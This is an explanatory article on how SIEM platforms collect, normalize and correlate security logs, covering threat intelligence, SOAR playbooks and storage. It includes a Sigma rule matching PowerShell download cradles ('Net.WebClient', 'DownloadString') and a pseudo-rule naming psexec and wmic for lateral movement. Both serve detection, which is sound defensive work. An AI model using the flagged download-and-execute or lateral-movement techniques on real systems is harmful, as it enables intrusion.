How SIEM Works: Security Information and Event Management
SIEM (Security Information and Event Management) is a centralized platform that collects, normalizes, correlates, and analyzes security event data from across an organization's entire IT infrastructure -- firewalls, IDS/IPS sensors, servers, endpoints, applications, cloud services, identity providers, and network devices. A SIEM transforms millions of individual log entries and alerts into actionable intelligence by correlating events across sources and time, detecting patterns that no single data source could reveal on its own.
The term SIEM was coined by Gartner in 2005, combining two earlier concepts: SIM (Security Information Management, focused on log collection and retention) and SEM (Security Event Management, focused on real-time analysis and alerting). Modern SIEMs have evolved far beyond simple log aggregation. They incorporate user and entity behavior analytics (UEBA), threat intelligence integration, automated response playbooks (SOAR), and increasingly, cloud-native architectures that can process petabytes of security telemetry.
This article covers the core architecture of SIEM systems: how logs are collected and normalized, how correlation rules detect threats, how threat intelligence enriches detections, how SOAR automates response, and the practical considerations of deploying and operating a SIEM at scale.
The Problem SIEM Solves
A mid-sized organization might generate security events from dozens of sources:
- Firewalls logging connection accepts/denies at 10,000+ events per second
- IDS/IPS sensors generating thousands of alerts per day
- Web application firewalls logging blocked and suspicious HTTP requests
- Windows Active Directory recording authentication events (4624, 4625, 4768, 4769)
- Linux auditd logging system calls, file accesses, and privilege escalations
- VPN concentrators logging user connections and disconnections
- DNS servers logging query/response pairs
- Email gateways logging spam, phishing, and malware detections
- Cloud platforms (AWS CloudTrail, Azure Activity Log, GCP Audit Log) recording API calls
- Endpoint Detection and Response (EDR) agents reporting process executions and file changes
Without a SIEM, a security analyst would need to log into each of these systems individually, manually correlate timestamps and IP addresses across different log formats, and somehow identify the needle-in-a-haystack pattern that indicates a real attack among millions of benign events. A SIEM automates this process.
Architecture Overview
Log Collection and Transport
The first challenge in building a SIEM is getting log data from source systems to the SIEM platform. There are several transport mechanisms, each with different trade-offs:
Syslog (RFC 5424)
The oldest and most universal log transport protocol. Originally defined as UDP on port 514 (RFC 3164), modern syslog uses TCP with TLS encryption (RFC 5425) for reliable, secure transport. Nearly every network device, Linux server, and security appliance can export logs via syslog.
Syslog messages have a standardized header containing priority (facility + severity), timestamp, hostname, and application name, followed by the message body. The message body format, however, is vendor-specific -- a Cisco ASA firewall, a Palo Alto NGFW, and a Linux auditd daemon all produce wildly different syslog message formats that must be parsed individually.
<134>1 2025-03-15T14:22:33.042Z fw-border-01 ASA 12345 - - %ASA-6-302013: Built inbound TCP connection 4521032 for outside:198.51.100.42/54321 (198.51.100.42/54321) to inside:10.0.1.50/443 (203.0.113.10/443)
Agent-Based Collection
Lightweight agents installed on endpoints forward logs to the SIEM. Common agents include:
- Elastic Agent / Filebeat -- ships log files and system metrics to Elasticsearch-based SIEMs.
- Splunk Universal Forwarder -- monitors log files, Windows Event Logs, and other data sources and forwards them to Splunk indexers.
- Fluentd / Fluent Bit -- open-source log collectors that support hundreds of input/output plugins.
- rsyslog / syslog-ng -- high-performance syslog implementations that can buffer, filter, and reliably forward log data.
Agents provide advantages over raw syslog: reliable delivery with buffering and retry, structured parsing at the source, encryption in transit, and the ability to collect data types that syslog cannot transport (binary files, Windows Event Log entries, container logs).
API-Based Collection
Cloud services and SaaS applications typically expose logs through REST APIs rather than syslog. The SIEM polls these APIs on a schedule (or receives webhooks) to ingest cloud security data:
- AWS -- CloudTrail (API audit), VPC Flow Logs, GuardDuty findings, WAF logs (via S3 or CloudWatch)
- Azure -- Activity Log, Azure AD sign-in logs, Defender alerts (via Event Hub or REST API)
- GCP -- Cloud Audit Logs, VPC Flow Logs (via Pub/Sub or Cloud Logging API)
- SaaS -- Office 365 Management Activity API, Google Workspace Admin SDK, Okta System Log API
Log Normalization and Enrichment
Raw logs from different sources use different field names, formats, timestamps, and conventions. A firewall might log source IPs as src, source_address, or SrcAddr. Timestamps might be Unix epochs, ISO 8601, or vendor-specific formats. Without normalization, writing correlation rules that span multiple data sources would require listing every possible field name variation.
Normalization maps raw log fields to a common schema. The two most widely used schemas are:
- Elastic Common Schema (ECS) -- an open-source schema with standardized field names (
source.ip,destination.port,event.action,user.name). Used by the Elastic Stack (ELK) and Elastic Security. - Splunk Common Information Model (CIM) -- Splunk's normalization framework with standardized field names organized into data models (Authentication, Network Traffic, Endpoint, etc.).
- OCSF (Open Cybersecurity Schema Framework) -- a newer open-source schema backed by AWS, Splunk, IBM, and others, designed as a vendor-neutral standard for security telemetry.
Enrichment adds context to normalized events:
- GeoIP -- resolve IP addresses to geographic locations, ASNs, and organizations.
- Asset inventory -- map IP addresses to hostname, owner, criticality, and business function. An alert on a development VM needs different urgency than the same alert on a production database server.
- Threat intelligence -- check IP addresses, domains, and file hashes against threat intelligence feeds to identify known malicious indicators.
- User identity -- resolve user IDs to names, departments, and roles via Active Directory or identity provider lookups.
- DNS resolution -- reverse-resolve IP addresses to hostnames for readability.
Correlation Rules
Correlation rules are the intelligence of a SIEM. They define patterns of events across multiple sources and time windows that indicate security threats. A well-designed correlation rule transforms millions of individual log entries into a handful of high-confidence alerts.
Rule Types
- Single-event rules -- alert when a single event matches specific criteria. Example: "alert when a firewall logs a connection to a known C2 IP address." These are simple threshold-less rules that rely on the quality of the matching criteria (usually a threat intelligence feed).
- Threshold rules -- alert when the count of matching events exceeds a threshold within a time window. Example: "alert when more than 10 failed SSH login attempts from the same source IP within 5 minutes." This filters out individual failed attempts (common, benign) while detecting brute-force attacks.
- Sequence rules -- alert when events occur in a specific order across multiple sources. Example: "alert when (1) a user authenticates to VPN from an unusual country, followed by (2) that user accessing a sensitive file share within 30 minutes." This detects compromised credentials being used from a foreign location.
- Aggregation rules -- alert based on statistical aggregation. Example: "alert when the total bytes transferred by a single internal host to external destinations exceeds 1 GB in one hour." This detects data exfiltration.
- Absence rules -- alert when an expected event does not occur. Example: "alert if a critical server has not sent a heartbeat log in 10 minutes." This detects silent failures or compromised logging.
Sigma Rules: Vendor-Neutral Detection
Sigma is an open-source, vendor-neutral detection rule format for SIEM systems. Sigma rules are written in YAML and can be automatically converted to the query language of any supported SIEM (Splunk SPL, Elastic KQL, QRadar AQL, Microsoft Sentinel KQL, etc.). This allows the security community to share detection logic without being locked into a specific SIEM vendor.
A Sigma rule detecting suspicious PowerShell execution:
title: Suspicious PowerShell Download Cradle
id: a3f9c5d7-b298-4c13-b4c6-d8f94e39a1b7
status: production
description: Detects PowerShell commands commonly used to download and execute malicious payloads
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\powershell.exe'
CommandLine|contains|all:
- 'Net.WebClient'
- 'DownloadString'
condition: selection
level: high
tags:
- attack.execution
- attack.t1059.001
- attack.t1105
The community maintains thousands of Sigma rules covering MITRE ATT&CK techniques, organized by tactic and platform. Sigma has become the de facto standard for sharing SIEM detection content.
Example Correlation Scenarios
Credential Stuffing Detection:
-- Pseudo-rule: multiple accounts failing auth from one IP
WHEN count(failed_auth events
WHERE source.ip = X
AND event.outcome = "failure"
GROUP BY source.ip
WITHIN 10 minutes) > 50
AND distinct_count(user.name) > 10
THEN alert "Credential Stuffing" severity HIGH
Lateral Movement Detection:
-- Sequence: compromised host scanning then connecting internally
WHEN event_A = (IDS alert "Network Scan" from host X)
FOLLOWED BY event_B = (
auth_success from host X to host Y
WHERE X != Y
AND both are in $HOME_NET
WITHIN 30 minutes of event_A
)
FOLLOWED BY event_C = (
process_creation on host Y
WHERE process.name in ("psexec.exe", "wmic.exe", "cmd.exe")
WITHIN 15 minutes of event_B
)
THEN alert "Probable Lateral Movement" severity CRITICAL
Data Exfiltration Detection:
-- Aggregation: unusual outbound data volume
WHEN sum(network.bytes_out
WHERE source.ip IN $INTERNAL_SERVERS
AND destination.ip NOT IN $KNOWN_BACKUP_DESTINATIONS
GROUP BY source.ip
WITHIN 1 hour) > 5GB
AND time_of_day NOT IN (scheduled_backup_window)
THEN alert "Possible Data Exfiltration" severity HIGH
Threat Intelligence Integration
Threat intelligence feeds provide lists of known-malicious indicators of compromise (IOCs) that the SIEM matches against incoming events in real time. IOC types include:
- IP addresses -- known command-and-control servers, scanning infrastructure, botnet nodes. These have a short shelf life; attackers rotate infrastructure frequently.
- Domain names -- malicious domains used for phishing, malware delivery, or C2 communication.
- File hashes -- SHA-256 or MD5 hashes of known malware samples, matched against endpoint file creation events or email attachment hashes.
- URLs -- specific malicious URLs (phishing pages, exploit kit landing pages).
- TLS certificate fingerprints -- certificates associated with malicious infrastructure.
- YARA rules -- pattern-matching rules for malware file content, used for endpoint and sandbox detections.
Threat intelligence is consumed via standardized protocols:
- STIX/TAXII -- Structured Threat Information eXpression (STIX) is a JSON-based language for describing threat intelligence. Trusted Automated eXchange of Indicator Information (TAXII) is the transport protocol for distributing STIX objects. Most commercial and open-source threat intelligence platforms support STIX 2.1/TAXII 2.1.
- MISP -- Malware Information Sharing Platform, an open-source threat intelligence platform widely used by CERTs, ISACs, and security teams for sharing IOCs in structured formats.
Common threat intelligence sources include commercial feeds (Recorded Future, CrowdStrike, Mandiant), open-source feeds (Abuse.ch, AlienVault OTX, PhishTank), and industry-specific sharing communities (FS-ISAC for financial services, H-ISAC for healthcare).
SOAR: Security Orchestration, Automation, and Response
SOAR extends the SIEM from detection to response. While a SIEM tells you "something bad is happening," SOAR defines what to do about it through automated playbooks. Modern SIEMs increasingly integrate SOAR capabilities natively (Splunk SOAR, Microsoft Sentinel Playbooks, Elastic Security response actions).
Playbook Architecture
A SOAR playbook is a sequence of automated actions triggered by a SIEM alert. Playbooks typically follow a pattern:
- Triage -- enrich the alert with additional context (query threat intel, look up asset criticality, check recent login history for the affected user).
- Evaluate -- apply logic to determine if the alert is a true positive or likely false positive. If the affected asset is a honeypot, escalate immediately. If the source IP is a known scanner, lower severity.
- Contain -- take automated containment actions: block the malicious IP on the firewall, isolate the affected endpoint from the network, disable the compromised user account, quarantine a malicious email across all mailboxes.
- Notify -- create a ticket in the incident management system, send Slack/PagerDuty notifications to the on-call analyst, escalate to the incident response team if severity warrants it.
- Document -- record all actions taken, evidence collected, and timeline in a case management system for post-incident review.
Example playbook -- phishing email detected:
- SIEM alert: email gateway detected a phishing email delivered to a user.
- SOAR queries the email gateway API to retrieve the full email (headers, body, attachments, URLs).
- SOAR detonates any attachments in a sandbox and checks URLs against threat intelligence.
- If confirmed malicious: SOAR searches for the same email across all mailboxes and quarantines all instances.
- SOAR checks if the user clicked any URLs in the email (via web proxy logs).
- If clicked: SOAR isolates the user's endpoint, resets their password, revokes active sessions, and creates a high-severity incident.
- If not clicked: SOAR creates a low-severity ticket for analyst review and sends the user a phishing awareness notification.
Storage and Retention
SIEM storage is one of the largest operational costs. A mid-sized organization ingesting 50,000 events per second generates approximately 4 TB of raw log data per day. Regulatory requirements often mandate retaining this data for 1-7 years, leading to petabyte-scale storage challenges.
Modern SIEMs use tiered storage architectures:
- Hot tier (NVMe/SSD) -- stores the most recent data (7-30 days) for real-time searching and correlation. This tier must support sub-second query response times. Elasticsearch, Splunk's indexer tier, and Clickhouse are common hot-tier backends.
- Warm tier (HDD) -- stores older data (30 days to 12 months) that is still searchable but with slower query performance. Data is typically compressed and indexed less aggressively.
- Cold/Frozen tier (object storage) -- stores archived data (1-7+ years) in cloud object storage (S3, GCS, Azure Blob). Data may need to be rehydrated before searching, with query times measured in minutes rather than seconds. This tier satisfies compliance and forensic requirements at minimal cost.
Strategies for managing SIEM storage costs include:
- Pre-ingestion filtering -- drop known-benign, high-volume events before they enter the SIEM. For example, successful DNS resolutions to known-good domains, routine SNMP polling responses, and health check logs from load balancers.
- Event summarization -- aggregate repetitive events into summary records. Instead of storing 10,000 identical firewall deny events per minute, store a single summary with the count, source, and time range.
- Selective indexing -- index only fields needed for searching and correlation. Raw log text is stored but not fully indexed, reducing storage by 30-50%.
- Data routing -- send high-value security data (authentication, IDS alerts, endpoint detections) to the full-featured SIEM and route operational data (performance metrics, debug logs) to a less expensive logging platform.
SIEM Deployment Architectures
On-Premises SIEM
Traditional SIEMs run entirely on-premises: dedicated hardware for log collection, indexing, storage, and the correlation engine. Splunk Enterprise, IBM QRadar, and the Elastic Stack (self-managed) are common on-premises deployments. Advantages include full data sovereignty and control over infrastructure. Disadvantages include significant capital expenditure, operational overhead, and scalability limitations.
Cloud-Native SIEM
Cloud-native SIEMs run as managed services in the cloud: Microsoft Sentinel (on Azure), Google Chronicle (on Google Cloud), Splunk Cloud, and Elastic Cloud. These platforms offer elastic scalability, reduced operational overhead, and consumption-based pricing. They are particularly well-suited for organizations with significant cloud infrastructure, as log collection from cloud services is often native and zero-configuration.
Hybrid SIEM
Many organizations adopt a hybrid approach: cloud SIEM for cloud workloads, with on-premises log collectors forwarding data from legacy infrastructure. This addresses data sovereignty concerns (keeping certain logs on-premises) while leveraging cloud scalability for storage and analysis.
Measuring SIEM Effectiveness
A SIEM is only as good as its detection coverage, alert quality, and response speed. Key metrics include:
- Mean Time to Detect (MTTD) -- the average time between an attack's first observable event and the SIEM generating an alert. Industry averages are disturbingly high (days to months for sophisticated attacks). A well-tuned SIEM targets MTTD under 1 hour for known attack patterns.
- Mean Time to Respond (MTTR) -- the average time from alert to containment. SOAR automation can reduce this from hours to minutes for common incident types.
- True positive rate -- the percentage of alerts that represent actual security incidents. A rate below 20% indicates severe over-alerting that leads to alert fatigue.
- MITRE ATT&CK coverage -- what percentage of ATT&CK techniques have corresponding detection rules? Organizations should prioritize techniques most relevant to their threat model.
- Events per second (EPS) -- the SIEM's ingestion rate. If the SIEM falls behind, events are dropped or delayed, and real-time correlation fails.
Common SIEM Pitfalls
- Collecting everything without a plan -- ingesting every possible log source without understanding what detection use cases each source enables. This wastes storage, increases cost, and makes the SIEM harder to operate. Start with high-value sources (authentication, network perimeter, endpoints) and expand based on specific detection gaps.
- Alert fatigue -- too many low-quality alerts desensitize analysts. Every alert should have a clear response procedure; alerts without actionable responses should be tuned, suppressed, or converted to dashboards.
- Set and forget -- SIEM rules need continuous tuning as the environment changes. New applications, infrastructure changes, and evolving attack techniques all require rule updates.
- No testing -- detection rules that have never been tested against simulated attacks may not work when a real attack occurs. Regular purple team exercises (offensive team + defensive team collaborating) validate SIEM detections.
- Inadequate log normalization -- without proper normalization, correlation rules must account for every possible field name variation, making them brittle and incomplete.
See It in Action
SIEM platforms ingest data from across the global internet infrastructure, including BGP routing events, IDS/IPS alerts, and WAF logs. Many organizations correlate BGP anomalies (route hijacks, route leaks) with SIEM data to detect sophisticated network-layer attacks. Use the god.ad BGP Looking Glass to explore the networks of major SIEM vendors and the infrastructure that generates the security telemetry these platforms analyze:
- AS36517 -- Splunk (now part of Cisco)
- AS8075 -- Microsoft (Azure Sentinel)
- AS15169 -- Google (Chronicle Security)
- AS14618 -- AWS (Security Lake, GuardDuty)
- AS36459 -- GitHub, a major target of security monitoring (and its actions generate telemetry that SIEMs consume)
Every connection, every DNS query, every authentication event traversing the BGP-routed internet generates data that feeds into SIEM platforms worldwide. Look up any AS number or IP address to see the routing paths these events traverse on their way from source to SIEM.